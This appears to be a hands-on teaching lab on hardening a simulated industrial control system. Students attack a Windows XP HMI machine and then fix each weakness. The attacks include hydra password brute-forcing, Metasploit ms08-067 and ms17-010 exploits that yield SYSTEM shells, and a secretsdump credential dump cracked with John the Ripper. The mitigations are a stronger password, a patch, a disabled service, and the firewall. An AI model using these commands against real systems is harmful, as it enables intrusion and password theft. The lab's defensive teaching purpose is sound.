Lab 1

Scenario Overview

The industrial control system (ICS) used in this scenario simulates an environment that might be used to cool industrial equipment. The ICS is made up of five systems. The first system contains a tank, tank level sensor and a water pump. The second system is a programmable logic controller (PLC) which controls the water pump based on the level of water found in the attached tank. The third system is an Open Platform Communications (OPC) server which accesses and modifies data found on the PLC. The fourth system is running Human Machine Interface (HMI) software which communicates with the OPC server to provide a human system operator with system statistics and control. The final system in the ICS is a security appliance that provides routing and firewall services for all systems. This scenario also make use of a system running Kali Linux. In this lab the virtual network switch is configured so that the Kail system receives all data transmitted. (Network diagram)

In this lab students will practice hardening a computer system. Students will discover that the system being testing has insecure passwords, unpatched software, unnecessary services in use and is not protected with a host based firewall. After exploiting all of these vulnerabilities students will learn to mitigate or remove the risk.

Part 1
Install Systems

In this part of the lab you are going to install and configure the systems needed to complete the lab.

  1. If necessary, install the free Oracle VirtualBox Manager software on your system.
  2. Download, and if necessary extract, the lab image ICS-VirtualBox.ova.
  3. Start the Oracle VM VirtualBox program.
  4. Import the ICS-VirtualBox.ova lab image.
  5. After the import has completed access the Settings for the Security Appliance virtual machine and change its configuration so that it is bridged to the network device in your host computer.
  6. Power on the systems in the following order:

Part 2
Work with Insecure Passwords

In this part of the lab you will demonstrate how easily an insecure password can be compromised. You will then set a secure password and verify that the vulnerability has been mitigated.

  1. Access the Kali system.
  2. At the login screen enter student into the Enter your username field and Password01 into the Enter your password field.
  3. Click the Log In button.
  4. Open a terminal (command prompt) window by clicking the Terminal Emulator button found at the upper left hand corner of the window ( Example ).
  5. Attempt to connect to the HMI system as the administrator user by typing the command smbclient --user administrator //$ and then guessing the administrator's password when prompted ( Example ).
  6. Use the hydra program with the rockyou.txt password dictionary to crack the administrator's password by typing the command hydra -l administrator -P rockyou.txt smb:// ( Example ).
  7. Now that you know the password, connect to the HMI system as the administrator user by typing the command smbclient --user administrator //$ and then typing in the administrator's password as discovered in the previous step.
  8. After the smbclient program starts type the command dir and verify that you can see the WINDOWS directory ( Example ).
  9. Type the command exit to terminate the smbclient program.
  10. Switch to the HMI system.
  11. Open a command prompt by first clicking the Start menu, then selecting the Run... option, typing cmd into the Open: field and finally clicking the OK button.
  12. From the command prompt set the process of changing the administrator's password by typing the command net user administrator * ( Example ).
  13. Assign a new password for the administrator which consists of at least 8 randomly chosen characters.
  14. Access the Kali system.
  15. Attempt to crack the administrator's new password by typing the command hydra -l administrator -P rockyou.txt smb:// ( Example ).
  16. Allow the hydra program to run for a minute or two then press the keyboard combination <CTRL>+C to terminate the program.
  17. Answer the questions related to passwords in the Lab Form found here.

Part 3
Demonstrate the Importance of Software Patches

In this part of the lab you will observe how unpatched software can lead to system compromise. You will then patch the system and verify that the vulnerability has been eliminated.

  1. From the command prompt on the Kali system use the command sudo nmap --script smb-vuln-ms08-067 to verify that the HMI system is vulnerable to the ms08-067 vulnerability which was patched by Microsoft on October 23, 2008 ( Example ).
  2. Use the command sudo msfconsole -x "use exploit/windows/smb/ms08_067_netapi;set rhost;run" to exploit the vulnerability and open a meterpreter command shell on the HMI system ( Example ).
  3. Type the dir command and verify that you are seeing the contents of a directory on the Windows system.
  4. Type the getuid command and verify that the exploit logged you in as the SYSTEM user.
  5. Type the exit command to exit the meterpreter command shell.
  6. Type the exit command second time to exit the msconsole program and return to the Kali command prompt.
  7. Switch to the HMI system.
  8. From the Desktop double click the windowsxp-ms08-067 icon.
  9. Review the material shown by the installation wizard then click the Next button.
  10. Select the I Agree radio button option then click Next when you see the license agreement window.
  11. Click the Finish button.
  12. Wait for the HMI system to install the patch and reboot.
  13. Access the Kali system.
  14. Type the command sudo nmap --script smb-vuln-sm08-067 to verify that the HMI system is NO LONGER vulnerable to the ms08-067 vulnerability.
  15. Take a screen shot of the previous command and paste it into the Lab Form found here.
  16. Attempt to use Metasploit to exploit the vulnerability by typing the command sudo msfconsole -x "use exploit/windows/smb/ms08_067_netapi;set rhost;run" ( Example ).
  17. Type the getuid command and verify that the exploit DID NOT log you in as the SYSTEM user.
  18. Type exit to return to the Kali command prompt.

Part 4
Remove or Disable Unnecessary System Services

In this part of the lab you will observe how unnecessary services can be used to compromise a system. You will then disable the unneeded service and verify that the vulnerability has been eliminated.

NOTE: In this part of the lab you will work with the ms17-010 vulnerability is a particularly nasty vulnerability in part because it affects systems for which there are no patches such as Windows XP. It is also interesting because the largest attack which exploited this vulnerability was the WannaCry ransomware attach which used the EternalBlue exploit developed by the NSA.

  1. From the command prompt on the Kali system use the command sudo nmap --script smb-vuln-ms17-010 to verify that the HMI system is vulnerable to the ms17-010 vulnerability ( Example ).
  2. Use the command sudo msfconsole -x "use exploit/windows/smb/ms17_010_psexec;set rhost;run" to exploit the vulnerability and open a meterpreter command shell on the HMI system ( Example ).
  3. Type the getuid command and verify that the exploit logged you in as the SYSTEM user.
  4. Type the reboot command.
  5. Type the exit command to exit the meterpreter command shell.
  6. Type the exit command second time to exit the msconsole program and return to the Kali command prompt.
  7. Switch to the HMI system and verify that the system is rebooting.
  8. After the HMI system has rebooted click the Start menu then click the Control Panel button.
  9. Select the Performance and Maintenance category.
  10. Select the Administrative Tools link.
  11. Double click the Services icon to start the Services utility.
  12. Scroll through the list of services and find the Server service.
  13. Double click the Server service and read the description of the service.
  14. Click the Stop button to terminate the running instance of the Server service.
  15. When you are informed that the Computer Browser service will also be stopped click the Yes button to acknowledge the warning.
  16. Click the OK button to close the Server Properties window.
  17. Access the Kali system.
  18. Type the command sudo nmap --script smb-vuln-ms17-010 to verify that the HMI system is NO LONGER vulnerable to the ms17-010 vulnerability.
  19. Take a screen shot of the previous command and paste it into the Lab Form found here.
  20. Attempt to use Metasploit to exploit the vulnerability by typing the command sudo msfconsole -x "use exploit/windows/smb/ms17_010_psexec;set rhost;run" ( Example ).
  21. Type the getuid command and verify that the exploit DID NOT log you in as the SYSTEM user.
  22. Type exit to return to the Kali command prompt.
  23. Switch to the HMI system.
  24. Restart the system by clicking on the Start menu, choosing the Turn Off Computer button then clicking Restart.

Part 5
Enable a Host Firewall

In this part of the lab you will use an open network port to extract the windows security database from a remote system. After capturing the encrypted security data you will use the John the Ripper tool to decrypt the user's passwords. You will then block the firewall by enabling a firewall and verify that the security database can not be remotely exploited.

  1. Switch to the Kali system.
  2. Use the command sudo nmap -p 445 to verify that the HMI system is listening on TCP port 445 and is therefore vulnerable to the secretsdump Metasploit module.
  3. Type the command sudo msfconsole to start the Metasploit program.
  4. After Metasploit starts, type the command use auxiliary/scanner/smb/impacket/secretsdump to select the secretsdump module.
  5. Type the command set rhosts to set the target (remote host) of the module as the HMI system.
  6. Type the command set smbuser student to tell the module to login using the student account.
  7. Type the command set smbpass Password01 to tell the module to use the password Password01.
  8. Type the command set outputfile secrets to tell the module to write the results of the scan to files named secrets.
  9. Type the command show options and verify that your options are set correctly ( Example ).
  10. Type the command run to execute the module.
  11. After the exploit has run, type the command exit to terminate the Metasploit program.
  12. Use the command ls to verify that the files secrets.sam and secrets.secrets were created ( Example ).
  13. Use the command john --wordlist=rockyou.txt --format=NT secrets.sam to crack the captured account data using the John the Ripper program ( Example ).
  14. Type the command john --show --format=NT secrets.sam to view the results.
  15. Take a screen shot of the previous command and paste it into the Lab Form found here.
  16. Switch to the HMI system.
  17. Click the Start menu then click the Control Panel button.
  18. Select the Security Center category.
  19. Scroll to the bottom of the page and click the Windows Firewall link found in the Manage security settings for: category of options ( Example ).
  20. Select the On (recommended) radio button then click OK.
  21. Switch to the Kali system.
  22. Use the command sudo nmap -p 445 to verify that the HMI system is NOT listening on TCP port 445 and is therefore NOT vulnerable to the secretsdump Metasploit module.
  23. Take a screen shot of the previous command and paste it into the Lab Form found here.
  24. Answer the remainder of questions in the Lab Form found here.
  25. To end the lab, power off the virtual machines.